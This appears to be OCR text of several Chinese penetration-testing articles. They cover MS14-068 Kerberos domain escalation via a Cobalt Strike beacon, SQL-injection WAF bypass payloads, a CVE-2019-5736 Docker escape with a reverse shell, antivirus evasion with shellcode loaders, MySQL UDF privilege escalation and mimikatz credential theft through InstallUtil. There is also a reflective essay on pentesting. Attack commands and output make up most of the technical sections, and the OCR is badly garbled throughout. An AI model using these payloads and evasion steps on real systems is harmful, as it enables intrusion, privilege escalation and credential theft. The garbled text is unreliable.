Acon? shell as14-068. exe “u test2@aclab. com -s S~1~5-21740739582663-9176860511-3211980599-1103 ~d 192. 168.100.10 “p Test123/com 
Tasked beacon to run: аз14-068. ехе ~u test2@aclab, com ~s S-1-5-21-4073582663-3176860511-3211980539-1103 -d 192. 168. 100.10 -p Test123/com 
bost called home, sent: 122 bytes 

! Teceived output 

l+] Building AS REQ for 192.168.100.10... Don 

111 Sending AS-REQ to 192, 168. 100.10... Done! 

re Receiving AS-REP from 192. 168, 100. 10... Done! 
He Parsing AS-REP from 192.168. 100.10... Done! 
1 Building TGS-REQ for 192. 168.100. 10... Done! 
чн Sending TGS-REQ to 192.168.100.10... Done! 

"1 Receiving TGS-REP from 192. 168. 100, 10,,. Done! 


l 
i+] р 
] Par Sing TGS-REP from 192. 168,100.10... Done! 


[$] Crea қ ç 
Creating ccache fale- TOT test2@aclab.com.ccache 





使 用 Mimikatz 进 行 注入 : 


beacon? »imikatz kerberos::ptc ТСТ test28aclab.com, ccache 


{+} Tasked beacon to тип aims 's kerberos :ptc TGT_test2@aclab. com. ссасће 


{+} host called home, sent: 699400 bytes 
[+] host called home, sent’ 63 bytes 


1+] received output 


Principai : (01) : test2 , @ ACLAB. COR 


Data © 
Staxt/End/WaxRenew: 2018/8/13 51 , 2018/8/13 2 
Service Name (01) : krbtgt ‚ ACLAB.CON , @ ACLAB.CON 
Target Name (01) : krbtet , ACLAB.COW , @ ACLAB. COE 
Client Ñame (01) : fest2 , @ ACLAB. CON 


Flags 50300000 1 pre_authent renewable ; proxiable forwardable 





这 样 就 获取 了 域 控 的 权限 
\\del. aclab. com\c$\users\adainistrator\desktop 的 目录 


2018/08/11 22:56 <DIR> 

2018/08/11 22: <DIR> 

2018/08/11 22 14,336 1. exe 

2018/08/10 si 67 flag. txt 
2 个 文件 14, 403 字 节 


三 


beacon) shell type \\ас1. aclab. com\c$\users\adainistrator\desktop\flag. txt 

1%] Tasked beacon to run: type \\dcl.aclab. com\c$\users\adainistrator\desktop\flag. txt 
[+] host called home, sent: 68 bytes 

[*] received output: 

flaglll3e9eb0c441f£949f2b45f a20£860429 ee} 

红包 :确认 过 眼神 你 是 对 的 人 





1985 





安防 软件 bypass 


0X01: mysql 尝 试 
今天 我 们 要 介绍 的 bypass 的 软件 是 某 知 名 安全 厂商 的 产品 ， 但 是 由 于 一 些 原因 所 以 我 们 将 他 的 名 字 
隐 去 ， 以 下 均 称 为 某 安防 软件 ， 下 面 我 们 来 党 试 怎么 绕 过 它 。 


首先 某 安防 软件 是 不 过 滤 大 部 分 符号 的 ， 所 以 前 期 还 是 可 以 手工 测 出 注入 ， 但 or 跟 and 百 分 之 1000 
会 拦截 ， 但 具体 怎么 才 会 拦截 ? 


环境 介绍 : 某 安防 软件 apache4.0 
php5.5 
Windows 


sql-labs 第 一 关 。 


0X02: 判断 注入 点 存在 
or 不 拦截 

and 不 拦截 

or 1 跟 and 1 都 拦截 

хог 1-1 不 拦截 

xor 1=2 不 拦截 


以 上 三 个 测试 合理 怀疑 or 跟 and 后 面 跟 有 数字 才 会 拦截 ， 但 xor (逻辑 异 或 ， 两 个 条 件 其 中 一 个 为 真 
时 结果 才 为 真 ) 却 不 会 拦截 


or —1 不 拦截 

and ~1 不 拦截 

and hex(1) 不 拦截 

and hex(1)=hex(1) 拦截 


and hex(1)!-hex(1) 不 拦截 


or -1--1 不 拦截 
and ~!=~1 不 拦截 
工 | 1 不 拦截 


以 上 测试 合理 推测 or 跟 and 后 面 只 要 加 特定 字符 加 数字 ， 有 可 能 不 拦截 ， 然 后 数字 之 间 是 = 的 话 ， 
有 可 能 拦截 ， 可 用 !- > < 等 符号 代替 测试。 
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and hex(1)=hex(1) 拦截 


and hex(1)!=hex(1) 不 拦截 ， 报 错 。 


Welcome 


апа hex(1)!=hex(2) FER, ARES, ME 注入 点 存在 。 


1987 


Welcome 
Your Login name:Dumb 


Your Password:1 





0X03: union 联 合 注入 


union 不 拦截 

select 不 拦截 

union select 拦截 

union 各 种 字符 select 拦截 

union/select/ 不 拦截 

但 union/select 1,2,3 出 不 了 数据 
{8XXX//sql/Less-1/?id=-1' union/!11440select/1,2,3 — + 


这 样 可 以 。 


1988 





сюижекжаензев DERUNSSGECH! 
пена: CETNAWESQDENEUR 


Бе 


п usua. 
2) ME, NBC S 
3) Найшла, Wine 


ç Ossa Oms O кен (улаша Ore Оло Nas Dow ў лари & — 


gw Load URL мир saitess 1/2: 1' and hox(t 


х Sone 


出 数据 : 

user() 拦截 
current_user 不 拦截 
database() 拦截 


hex(database//(//)) 不 拦截 但 要 自己 hex 转 str 


1 








http;//XXX//sql/Less-1/?id--1e1'union/!11440select/1/*//111440database()/,3 -+ 拦截 
http//XXX//sq/Less-1/?id--1e1'union/111440select/1/!a/ /111440database()/,3 — + 


出 数据 例子 ， 不 拦截 


-1 union/!11440select*/1,username,3 from security.users limit 1,1— + 不 拦截 。 
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Docker 常 用 命令 与 Docker 逃 逸 漏洞 复 现 ， 


0x01 Docker 命 令 介 绍 
操作 镜像 相关 命令 


$ docker pull [Repository name]:[tag] // 从 docker 镜 像 仓 库 获 取 镜 像 ， 默 认为 从 Dockt 
$ docker search [image name] /VDocker Hub 中 查找 镜像 

$ docker image ls /docker images // 列 出 已 有 镜像 

$ docker rmi [image name/image ID] // 删 除 镜像 〈 需 先 删除 镜像 对 应 的 容器 ) 


操作 容器 相关 命令 


$ docker run -d -p [host port]:[docker port] [image name] bash  // 新 建 并 启动 一 个 容 ; 


$ docker ps -a // 列 出 所 有 容器 
$ docker exec -it [container id] bash // 进 入 一 个 docker 容 器 


$ docker cp [file path] [container id]:[container path] // 拷 贝 文件 到 容器 


$ docker start/stop [container id] // 启 动 /停止 容器 
$ docker rm [container id] // 删 除 容器 (ASLA, SA 


» 


0x02 Ооскег& 9291 (CVE-2019-5736) 
简介 


2019 年 2 月 11 日 ，runC 的 维护 团队 报告 了 一 个 新 发 现 的 漏洞 ， 该 漏洞 最 初 由 Adam lwaniuk 和 Borys 
Poplawski 发 现 。 该 漏洞 编号 为 CVE-2019-5736， 漏 洞 影响 在 默认 设置 下 运行 的 Docker 容 器 ， 攻 击 
者 通过 重 写 宿 主机 上 的 runC 二 进 制 文件 导致 命令 执行 。 


影响 版 本 


1990 


“ docker version <=18.09.2 


e RunC version «-1.0-rc6 


利用 方式 


。 宿主 机 利用 攻击 者 提供 的 image 来 创建 一 个 新 的 container 
。 拥有 container root 权 限 ， 并 且 该 container 后 续 被 docker exec attach (后 面 将 用 此 方式 漏洞 复 
现 ) 


如 何 获 取 一 个 docker 容 器 的 权限 
Docker Remote APl 未 授权 访问 漏洞 


Docker swarm 是 一 个 将 Docker 集 群 变 成 单一 虚拟 的 Docker host 工 具 ， 如 果 你 的 Docker 使 用 了 它 ， 
本 地 会 开放 一 个 2375 端 口 ， 这 个 端口 对 应 的 就 是 Docker Remote API， 可 以 执行 docker 命 令 。 该 漏 
洞 可 直接 执行 操作 docker 的 命令 ， 并 获取 docker 容 器 的 权限 。 


1. 获 取 存 在 Docker Remote API 的 docker 后 ， 执 行列 出 容器 的 命令 。 


docker -H [ip]:2375 ps 








2. 获 取 docker 容 器 的 权限 。 


docker -H [ip]:2375 exec -it [container id] bash 


root@ggyao-virtual-machine:~# docker -H ^ ^" *32:2375 exec -it 00a88a3e3ecO0 bash 
root@00a88a3e3ec0: /# whoami 





00038833e3ec0: # ifconfig 


漏洞 复 现 


1. 安 装 漏洞 环境 。 


root@zero-virtual-machine:~# bash CVE-2019-5736-install-docker.sh 
05: , ubuntu 
8 Executing docker install script, commit: 6bf306318ebaab958c4adc341a8c7bb9f3aS4ala 
apt-get update -qq >/dev/null 
apt-get install -y -qq apt-transport-https ca-certificates curl »/dev/null 
curl -fsSL “https: //download.docker.com/Linux/ubuntu/gpg” | apt-key add. “qq - >/dev/null 


echo "deb [arch=amd64] https: //download.docker.com/linux/ubuntu xenial stable”)> /etc/apt/sourc 
-d/docker tist 
apt-get update -qq >/dev/null 
INFO: Searching repository for VERSION '18.66,.6° 
INFO: apt-cache madison’ 'docker-ce' | grep '18.96;0.*-0-ubuntu' | head -1 | аяк 1 4S15293);1" | cut. dt 
-f 3 





查看 docker 版 本 


docker --version 
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root@zero-vir tuat-machi - -version 
Docker versior 18.06.0-ce, build effa825 


гооЧ“йгего-уісг Тат-часттлетти docker-runc -version 
runc version 1.0.0-rc5«dev 


"n 


commit: 69665T000406691 €088123a60108003f 3340 
spec: 1.0.0 


wzero-virtual-machine:~# 





2, 修 改 漏洞 POC， 将 POC 中 的 命令 修改 为 反弹 shell。( 
) 


原版 POC: 


main.go 
"ui d 


m 


eoo 


pa 1 
import 
geste V —————Á———S д node S 
ar payload 3 
)————————————————————á—PÀ 
func main ( 
fd, ert os.Createt 
f err : { 
fmt.Print £ 
retu 


fmt.Fprintln(fd, 
etr fd.Close( 


if err = 1 
fmt.Printiníer:r 


将 命令 修改 为 反弹 shell: 
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- С main.go i = ° @ 9 





3. 编 译 生成 payload。 


CGO ENABLED-O GOOS-linux GOARCH-amd64 go build main.go 


xp pot /CVE-2019:5736-PoC-master& CGO ENABLEDZO 6005=1 іпих GOARCH=amd64 qo build main.go 


rootükalii- xp. poc /CV 019. 5-1 f ter ls 
зіп @main.go  README.md screenshots 





4. 将 该 payload 拷 贝 到 docker 容 器 中 〈 此 时 可 以 模拟 攻击 者 获取 了 docker 容 器 权限 ， 在 容器 中 上 传 


Sp ` 


рауіоа Чтаоскег>5%) 


root@zero-virtual-machine:~# docker cp main e3:/home 
root@zero-virtual-machine:~# docker exec -it e3 bash 
root@e3b34cc9dcbc:/# cd /home/ 
root@e3b34cc9dcbc: /home# 15 

main 


root@e3b34cc9dcbc: /home# chmod 777 main 
root@e3b34cc9dcbc: /home# ls 
main se us (ofi 
root@e3b34cc9dcbc: /home# B. 
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5. 执 行 payload， 等 待 受害 者 去 连接 docker 容 器 。 


root@e3b34cc9dcbc:/home# ./main 
*] Overwritten /bin/sh successfully 





攻击 者 开启 nc 监听 。 


root@VM-0-7-ubuntu:~# nc -Lvp 8080 
istening on [0.0.0.0] (family 0，port 8080) 





6. 受 害 者 启动 docker 容 器 时 触发 payload。 


О Ф Ф rootQe3b34ccSdcbc /home 
. N 
s 
: 
1 о o- " /hone/zero/ B B /main' 
ғ 15 > 


5 
get-docker.sh main утызга. 5001 


docker ср main е1:/һове 
chine:-# docker exec -it e3 bash 


tootéeib34cc9dcbc: /homes# chmod 777 maie 
rootgeib34cc9dcbc:/homes ls 


e PIO: 45 
liy got the file handle 


sfully got write handle &š(9xc42838e2c0] 
root@e3b34cc9dcbc:/ho 





7. 成 功 接收 到 一 个 宿主 机 的 shell。 
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root@VM-0-/-ubuntu:~# nc -lvp 8080 
listening on {8.0.0.8} (family Ə, port 8080) 
onnection from [ { ] port 

C (15716): 
s + 


family 2, 


8566 f 41604245 lec 209b72a7 3b 2b f 88c 678 f 9e f 8a9586084 34 whoami 
hoami 
root 

8566 f 91604245 lec 209b72a7 3b2bf 08c 678 f 9e f8a0586084 3# 
ifconfig 

fockerO Link епсар: LLAR I2 155:a5:f4:09 
і hr&3:255.255 ). Ü 
inet6 і: fe8@::42:55ff: feaS: #409/64 Sc ope 
UP BROADCAST RUNNING MULTICAST  MTU:1500 ғ 
197 94 :9 ) $£35::0 GRO 5$532:0 


ifconfig 


3:5910 (5.9 KB) 
Link encap: Ж SBS Het 00:0с :29:е4:18:6ө3 
inet H u$ 
inetó 地 址 : fe80::ce2b:B862:262c:b163/64 Scope: 
MTL 
ғ:ө 

: 26805 š 

€ GL Py t< $ + 1000 

292660634 (202.6 MB) 


ӨШ ӨС TS. RE = 
уф Б 55.0.0.0 
ineto + : 321/128 Scope:Host 
UP LOOPBACK RUNNING МТ0:65536 
F 2445 š : 
‘0-4 
j :1000 
学 节 :235367 (235.3 KB) :23536/ (235.3 
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sport 4673) 








渗透 沉思 录 
渗透 沉思 录 


本 课时 ， 是 无 相关 技术 介绍 ， 但 笔者 认为 本 课 便 是 整个 系列 的 点 睛 ， 故 此 时 选择 主 谈 一 课时 "关于 渗 
透 的 沉思 "。 


在 谈 " 渗 透 的 沉思 "之 前 ， 先 来 解决 几 个 问题 。 也 是 这 几 天 邮件 以 及 留言 的 主要 问题 之 一 。 


к= 


E 


P 


刚 入 门 应 该 学 习 那 一 块 知识 ? /安全 从 业者 工作 多 年 感觉 心 累 ， 知 识 更 新 太 快 ， 跟 不 上 了 ， 怎 么 
办 ? 


是 不 是 应 该 选择 并 新 学 习 一 个 大 型 渗透 框架 来 做 渗透 ? 
某 项 目 / 某 目标 渗透 没有 任何 思路 了 ， 怎 么 办 ? 


这 三 个 问题 应 该 是 每 一 个 安全 从 业者 在 不 同 的 阶段 一 定 会 遇 到 的 三 个 问题 。 同 时 笔者 曾 遇 到 过 
4 四 次 瓶 巴 ， 也 分 别 与 以 上 大 致 相同 ， 只 是 第 四 次 迷茫 瓶 巴 ， 会 在 未 来 的 课时 中 更 新 。 


网 络 安全 是 一 个 特殊 的 行业 ， 亦 正 亦 那 。 亦 又 一 新 兴 行 业 ， 虽 前 景 可 期 ， 但 是 大 多 数 人 都 在 " 措 
石头 过 河 “ 虽 前 岸 可 期 ， 却 对 河水 深浅 无 所 知 。 无 论 是 入 门 还 是 工作 多 年 都 会 遇 到 特别 迷 东 期 ， 
选择 哪个 方向 ， 亦 或 者 知识 无 心 更 新 ， 网 络 安全 应 该 选择 一 个 可 以 “沉淀 "下 来 的 方向 便 是 最 好 
的 方向 ， 让 多 年 的 知识 或 者 技能 沉淀 下 来 ， 形 成 知识 化 ， 体 系 化 ， 与 传递 化 。 最 简单 的 一 个 例 
子 ， 笔 者 应 该 在 2009 年 写 过 “针对 一 流 信息 拦截 系统 "的 技巧 与 归纳 ， 回 过 头 看 来 ， 这 个 技术 在 
今天 还 能 用 吗 ? 甚至 一流 拦截 "* 这 个 软件 都 没 7。 但 是 能 留 下 来 至 今 依然 有 用 的 便 是 : 知识 化 
(对 一 流 拦 截 的 研究 总 结 ) ， 体 系 化 (对 当时 waf 等 的 系统 归纳 ) ,传递 化 (文章 分 享 ) 。 我 
把 它 简称 渗透 "三 板 伏 "， 更 像 是 : 学 习 ， 归 纳 ， 总 结 ， 分 享 的 一 个 完整 流程 。 并 非 知识 太 快 ， 

并 非 哪 一 安全 方向 领域 就 一 定 更 有 前 景 ， 而 是 这 "三板 荐 "是 否 完整 连接 。 


‚ 渗透 测试 发 展 到 如 今 ， 工 具 五 彩 缤纷 ， 框 架 五 颜 六 色 ， 姿 势 日 益 骚 奇 。 知 识 来 源 手段 源源 不 


断 ， 一 会 推 特 ， 一 会 小 密 圈 ， 有 眼花 综 乱 ， 应 该 怎么 去 看 待 ? 这 里 笔者 先 把 这 个 问题 放下 来 ， 不 
知 大 家 看 没 看 过 《天 龙 八 部 》， 也 借 此 缅怀 金庸 先生 ， 在 天 龙 八 部 中 ， 原 著 用 一 百 万 字 在 讲述 
一 个 非常 悲剧 的 故事 ， 想 复仇 的 得 不 到 复仇 ， 想 复 国 的 得 不 到 复 国 ， 想 复婚 的 得 不 到 复婚 。 虚 
ТИЕ? 又 是 不 忘 初 心 ， 虽 内 功 与 美人 竟 得 ， 但 却 再 也 回 不 去 少林 了 。 刚 认 父母 ， 便 生死 相 离 。 
8 个 字 概 括 整个 著作 便 是 人 生 八 苦 : Яң, ZA, жш, Ял, Еа, BBS, RMS 
苦 ， 五 阴 炽 盛 苦 。 也 正 是 Micro8 系 列 的 主旨 8 章 标题 ， 在 扫地 僧 一 集中 是 这 样 说 道 : 
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‚ 同样 渗透 也 一 样 ， 并 不 是 强制 个 人 追求 工具 ， 框 架 ， 姿 势 来 强制 推演 表面 的 功力 ， 正 如 鸠 摩 知 
一 样 ， 靠 小 无 相 功 来 驱动 少林 72 绝 技 ， 最 终 走 火 入 魔 ， 人 走向 最 后 的 迷茫 。 反 观 乔 峰 ， 主 要 就 
会 那么 几 招 ， 便 震 出 扫地 僧 口 吐 少许 鲜血 。 获 取 工 具 /框架 /姿势 等 越 多 并 非 是 一 件 好 事 ， 当 没 
有 自己 的 知识 体系 的 时 候 ， 反 而 导致 知识 混乱 ， 体 系 复 杂 。 当 遇 上 实战 场景 ， 不 知 用 哪 一 招来 
制胜 。 混 乱 一 通 ， 权 限 丢失 ， 踪 迹 圳 出。 最 终 一 场 空 。 渗 透 的 沉思 非常 重要 ， 尤 其 是 在 后 渗透 
阶段 ， 需 要 有 着 一 套 非常 完整 周期 计划 ， 思 考 可 能 遇 到 的 问题 ， 或 者 通过 已 知 的 信息 搜集 ， 来 

导 可 能 面临 的 问题 ， 这 就 是 渗透 的 沉思 。 招 式 不 在 多 ， 在 于 精 ， 力 道 不 在 狠 ， 在 于 寸 。 故 本 
系列 并 非 是 仅仅 ms 人 教程， 仅仅 是 认为 它 能 让 笔者 融会 贯通 ， 在 结合 到 其 它 需 求 ， 借 力 发 力 的 
去 进一步 渗透 。 说 到 融 汇 贯通 ， 必 须要 提 到 ' 链 "， 安 全 是 一 个 链 安全 ， 攻 击 引 入 链 攻击 ， 后 门 
引入 链 后 门 。 具 体 参 考 : 高 级 持续 渗透 系列 的 连载 ， 它 不 是 在 讲述 一 个 后 门 ， 而 是 一 个 概念 的 
引入 。 


. 渗透 的 本 质 是 信息 搜集 ， 每 一 次 的 项 目 如 果 磁 到 迷茫 无 解 的 时 候 ， 请 继续 搜集 。 而 信息 搜集 的 
本 质 是 渗透 的 沉思 ， 与 线索 "“ 链 "的 关联 。 每 一 次 真实 的 攻击 演练 项 目 ， 最 难得 并 非 是 入 侵 攻 
击 ， 也 并 非 是 得 到 域 控 或 最 高 权限 。 而 是 如 何 把 渗透 攻击 演变 成 一 次 对 己 有 利 的 一 个 过 程 。 后 
渗透 需要 沉淀 ， 而 沉淀 需要 给 渗透 留 下 沉思 的 时 间 。 用 “沉思 "来 化 解 五 彩 缤纷 的 工具 ， 五 颜 六 
色 的 框架 ,日益 骚 奇 的 姿势 ， 当 刻 气 化 解 时 ， 便 形成 一 套 了 自我 知识 体系 。 
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3. аад ачынды 在 结合 天 只 其 他 "招式 "， 如 行 去 流水， 石 便 是 
器 ， 枝 便 是 剑 。 -— 
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项 目 回忆 : 体系 的 本 质 是 知识 点 串联 
项 目 回 忆 : 体系 的 本 质 是 知识 点 串联 


Micropoor 


拿 she11 过 程 略 过 。 (由 于 文章 在 项 目 实施 结束 形成 ， 故 部 分 无 图 或 本 地 补 图 ) 


目标 机 背景 : 
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oft Windows Server 2008 R2 Enterprise 
rvice ck 1 Build 7601 


ft Corporation 


Hultiprocesso 
dows RA 


产品 ID 


初始 安装 日 期 


Re 个 处 理 器 。 

(011: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel 
[02] 4 ping 1 GenuineIntel 
S 25_075310-bu11d10b18 


2,754 MB 


efile. sys 


[02] 
[03] 
[04]: 
(051: КВ 
[06] 





端口 开放 如 下 : 
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fc netstat -an |findstr 


ТЕР 
ТЕР 
ТЄР 
ТСР 
ТСР 
ТСР 
тер 
TCP 
ТСР 
ТСР 
ТСР 
ТСР 
ТСР 
ТСР 
ТСР 
ТЕР 
ТСР 
ТСР 
TCP 
ЛЕР 


dw 


vm 


Zh 


m 
plorer.exe 


WWD. exe 


-tr 


je0rp.exe 


uDongFangYu.exe 


"LISTENING" 


ағ 


LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 





本 地 补 图 (由 于 项 目 在 实施 后 形成 该 文章 ， 故 本 地 靶 机 补 图 ) 
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既然 知道 了 目前 的 主流 查 杀 方式 ， 那 么 反 制 查 杀 ， 此 篇 采取 特征 与 行为 分 离 免 杀 。 避 免 PE 头 文件 ， 
并 且 分 离 行 为 ， 与 特征 的 综合 免 杀 。 适 用 于 菜刀 下 等 场景 ， 也 是 我 在 基于 windows 下 为 了 更 稳定 的 
一 种 常用 手法 。 载 入 内 存 。 


0x00: 以 msf 为 例 : 监听 端口 


) > show options 
Madule options (exploit/multi/handler) 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp) 


Current Setting Required Descriptio 


ITFUNC process yes technique (Accepted: '', seh. thread, process, none) 


еп 655 


it target 
Name 


wildcard Target 


> set lhost 192.168.1.5 
> exploit «2 


[+] Started TE TCP handler on 192.168.1.5 





0x001: 这 里 的 payload 不 采取 生成 pe 文件 ， 而 采取 shellcode 方 式 ， 来 借助 第 三 方 直接 加 载 到 内 存 
中 。 避 免 行为 : 


Ш f raw > test.c 
is deprecated 





0x002: 既 然 是 shellcode 方 式 的 payload ， 那 么 需要 借助 第 三 方 来 启动 ， 加 载 到 内 存 。 执 行 
Shellcode， 自 己 写 也 不 是 很 难 ， 这 里 我 借用 一 个 github 一 个 开源 : 
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https://github.com/clinicallyinane/shellcode launcher/ 


作者 的 话 : 建议 大 家 自己 写 shellcode 热 行 盒 ， 相 关 代 码 网 上 非常 成 熟 。 


С: Wsers \WJohnn \Desktop\she llcode_launcher-—master>she llcode_launcher.exe 


Starting up 
Calling file now. Loaded binary at: 0x002hb008080 











常规 。 | 安全 | 详细 信息 | 以 前 的 版 本 | 


D m 
文件 类 型 : C Source (с) 
打开 方式 。 四 Microsoft via st жас). | 


大 小 : 416 ZH (476 字 节 ) | 
空间 : 4.00 KB (4,096 Z) 






















co Bool arelteTotugceDeskeop'esiebireode7Tuuancher 
T 
1 






— 


ITT 3 


创建 时 间 : 2018129209. 23:39:30 
修改 时 间 : 2018129209, 23:39:34 
访问 时 间 : ”2018 年 12 月 20 日 ，: 


ЕЕ — rom ommo жас). | 
TE 此 文件 3 ee 
Т? PSOE Bes HIRE | 
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-i test. 





bh One engine detected this file » 
Clamav A Ad-Aware 
AegisLab AhnLab-v3 
ALYac Antiy-AVI 
Arcabit Avast 
Avast Mobile Security AVG 
Avira Babable 
Baidu BitDefender 
Bkav CAT-QuickHeal 
CMC Comodo 
Cyren DrWeb 
Emsisoft eScan 
ESET-NOD32 F-Prot 
F-Secure Fortinet 


g st 


ior pened (192.168 


created in the background 
ң га 


r) > [j 





而 关于 自 带 安 装 分 离 免 杀 ， 请 参考 我 在 公司 Wiki 上 写 的 第 六 十 九 课时 payload B % 28 LER SB — = 


payload 反 弹 到 vps 的 msf 上 ， 我 的 权限 仅仅 如 下 。 


indo 
whoami 


11S apppoo 





2004 


参考 主机 背景 图 ，184 个 补丁 ， 以 及 某 套 装 。 遂 放弃 了 exp 提 权 。 

RAL 需要 更 多 的 时 间 消 耗 在 对 反 病 毒 软 件 对 抗 。 

原因 2: 目标 机 补丁 过 多 。 需 要 消耗 更 多 的 时 间 

原因 3: 非常 艰难 的 环境 下 ， 拿 到 了 权限 ， 不 想 因为 某 些 exp 导 致 蓝屏 从 而 丢失 权限 。 

开始 翻阅 目标 机 上 的 文件 ， 以 及 搜集 目标 机 的 端口 ， 服 务 ， 启 动 等 一 系列 信息 。 发 现 目标 机 安装 mysq1， 并 与 


下 载 目 标 机 * , .MYI，* .MYD，* .frm， 加 载 于 本 地 mysql。 得 到 目标 机 root 密 码 









Mise 20S зізк ELI 


= fh е2 m D 





> 

口 |Host User Password Se] 
[] localhost root (сағ cam, M sd nit" ann [ү 
g: root kais PRESSE] Y 

* N 


而 上 且 标 机 没有 相关 脚本 环境 连接 mysq1， 到 这 里 ， 可 以 有 2 个 方向 针对 该 问题 作出 解决 
一 : 转发 目标 机 端口 到 本 地 ， 从 而 操作 mysq]。 


=: 在 非 交 互 式 下 ， 完 成 mysql udf 的 提 权 。 


为 了 减少 目标 主机 的 流量 探测 ， 以 及 维护 来 之 不 易 的 session， 故 选择 了 第 二 种 方案 。 非 交互 式 
下 ，mysql 提 权 。 


也 就 是 所 有 参数 需要 mysql.xxxx 





Diu ‚7 ¿AXmysqlSxbin>mysql -uroot -p Sier en" SELECT VERSION()" 
mysql -uroot -p11111 -e "SELECT VERSION()" 
VERSION() 


5.1.49 community-loq 
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; mysql5%xbin>mysql -uroot -p ` -е “create table a (cmd LONGBLOB) 
-e "create table a (cmd LONGBLOB) 


at line 1: No database selected 





大 致 流程 如 下 : 


mysql -uroot -pXXXXXX -е "create table mysql.a (cmd LONGBLOB);" 

mysql -uroot -pXXXXXX -e "insert into mysql.a (cmd) values (hex(load_file('D:\x 
mysql -uroot -pXXXXXX -e "SELECT unhex(cmd) FROM mysql.a INTO DUMPFILE 'D:/XXxx 
mysql -uroot -pXXXXXX -е "CREATE FUNCTION shell RETURNS STRING SONAME 'uu.dll'" 


mysql -uroot -pXXXXXX -e "select shell('cmd','whoami');" 


uroot -р11111 -€ "SELECT shell ('Ехес', 'whoami’)" 


cami‘ }" 





需要 解决 的 第 三 个 问题 : 登录 服务 器 
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D:NE. 
net user guest 


an f 
OOQ i 


Mo 


2018/12/25 4:29:05 


018/12/25 4:29:05 


*Administrators 
* None 


socks 代 理 登录 目标 机 : 








需要 解决 的 第 四 个 问题 : 抓 取 目标 机 明文 密码 


一 ; 关闭 我 能 关闭 的 套装 ， 由 于 管理 员 没有 注销 登录 。 能 关闭 的 有 限 。 
=: 分 离 免 杀 做 mimikatz 密 码 抓 取 


作者 选择 了 第 二 种 方案 : 


这 里 需要 用 到 csc .exe, 与 InstallUtil.exe 


关于 两 个 文件 默认 安装 位 置 : (注意 x32，x64 区 别 ) 
C:WindowsMicrosoft.NETFramework 
C:WindowsMicrosoft.NETFramework64 
C:WindowsMicrosoft.NETFramework 


C:WindowsMicrosoft.NETFramework64 


м 3. АМ 


О 正在 准备 桌面 … 


分 别 执 


C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /r:System.EnterpriseServices. 


C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile- /LogToConsc 


This compiler іс provided as part of the Microsoft (R> .МЕТ Framework, but only 
supports language versions up to СЙ 5, which is no longer the latest version. Fo 
r compilers that support never versions of the CB programming language, see http@ 
=//go. microsoft .com/fulink’? LinkID=53324@ 


C:\Windows \systen32>cd C: Users \guest Desktop 


С: Wsers Guest Des ktop>C: Mhindows Microsoft .NET \Framevork64\v4.0.38319\csc.exe 7 
Br: System.EnterpriseServices.dll /r:System.[0.Compression.dll /target:library /ou 

tim.exe /keyf ile:C: Wsers \qguest Desktop\installutil.snk /unsafe С: Users \quest М) 
mesktop\nimi-.cs 

Microsoft (R> Visual CR Compiler version 4.7.39862 .8 

for CHS 

Copyright (C) Microsoft Corporation. All rights reserved. 


This compiler is provided as part of the Microsoft <А» „МЕТ Framework, but only 
supports language versions up to Ct 5, which is no longer the latest version. Fo 
r compilers that support newer versions of the CH programming language, see http 
a: //go.microsoft.com/fwlink/?LinkI D=533246 


С: Users Guest Desktop>C: Windows Microsoft .NET \Framevork64\v4.4.380319\Instal lt 
il.exe /logfile= /LogToCansole=false /U С: \Wsers\guest DesktopNn.exe 


(CNimimikatz 2.0 alpha x64 (oe. eo) 





version Display some version informations 
cd Change or display current directory 
markruss Mark about PtH 


Amimikatz(commandline} H C:\Users\guest\Desktop\m. exe 


ERROR mimikatz dolocal : “C:\Users\guest\Desktop\m.exe” command of "standard" mo 
Mdule not found ! 


Module : standard 
Full name : Standard module 
Description : Basic commands (does not require module name) 


exit - Quit mimikatz 
cls Clear screen (doesn't work with redirections, like PsExec) 
answer - Answer to the Ultimate Question of Life. the Universe. and 
Everything 
соҒҒее Please. make ме а coffee! 
sleep - Sleep an amount of milliseconds 
log Log mimikatz input/output to file 
base6á - Switch file output/base64 output 
version Display some version informations 
са Change оғ display current directory 
markruss - Mark about PtH 


Amimikatz # 





派生 出 的 第 五 个 问题 : 横向 渗透 


? ` 


» 

ЗЕ EHERAÉUmssql, mysql, г 
成 了 本 次 的 项 目 。 

如 需 具体 ， 请 参考 我 在 Wiki 上 的 系列 教程 78，79，12，13，71 课 时 。 









„- RARER 


Bows out, for 
ee 





在 每 次 分 享 的 同时 ， 深 深 发 现 ， 原 来 分 享 ， 才 是 我 最 好 的 老师 。 


| E. 


Frida 在 APP 远 程 加 解密 中 的 应 用 
简介 


工作 项 目 中 经 常会 遇 到 金融 客户 需要 做 APP 渗 透 测试 ， 测 试 过 程 中 发 现 大 多 数 APP 的 通信 协议 做 了 
手脚 ， 要 么 是 无 法 抓 包 、 要 么 是 无 法 看 到 抓 到 包 的 详细 内 容 ， 遇 到 加 壳 的 情况 又 很 多 ， 此 时 又 要 脱 
壳 、 又 要 分 析 算 法 、 又 要 实现 解密 工具 ， 头 都 大 了 ， 难 不 成 提交 "0 高 位 、0 中 危 、0 低 危 "? 我 怕 客 户 
投诉 我 ! 幸亏 各 种 HOOK 框 架 的 产生 让 我 疏 了 口气 ， 本 文 使 用 Frida 框 架 ， 基 于 Frida 的 工具 有 几 个 ， 
brida 就 是 其 中 一 个 ， 但 其 实际 意义 不 高 ， 实 际 操 作 中 ， 客 户 端的 Request 只 有 Encode， 没 有 
Decode， 且 非 对 称 加 密 ， 没 机 会 调用 函数 加 密 解密 ， 并 且 繁 琐 ， 不 通用 。 另 外 在 使 用 了 市 面 上 其 他 
工具 后 发 现 都 存在 这 样 的 问题 ， 所 以 才 产 生 了 本 文 的 实现 方式 一 一 利用 Frida、Burp Suite. Python 
实现 在 APP 数 据 加 密 前 进行 拦截 并 远程 修改 明文 内 容 后 再 加 密 发 送 并 解密 Response 包 。 


Frida 介 绍 


官方 网 站 介绍 "Dynamic instrumentation toolkit for developers, reverse-engineers, 
and security researchers." 他 是 个 动态 的 代码 工具 包 ， 基 于 Python + JavaScript 的 HOOK 与 调试 杠 
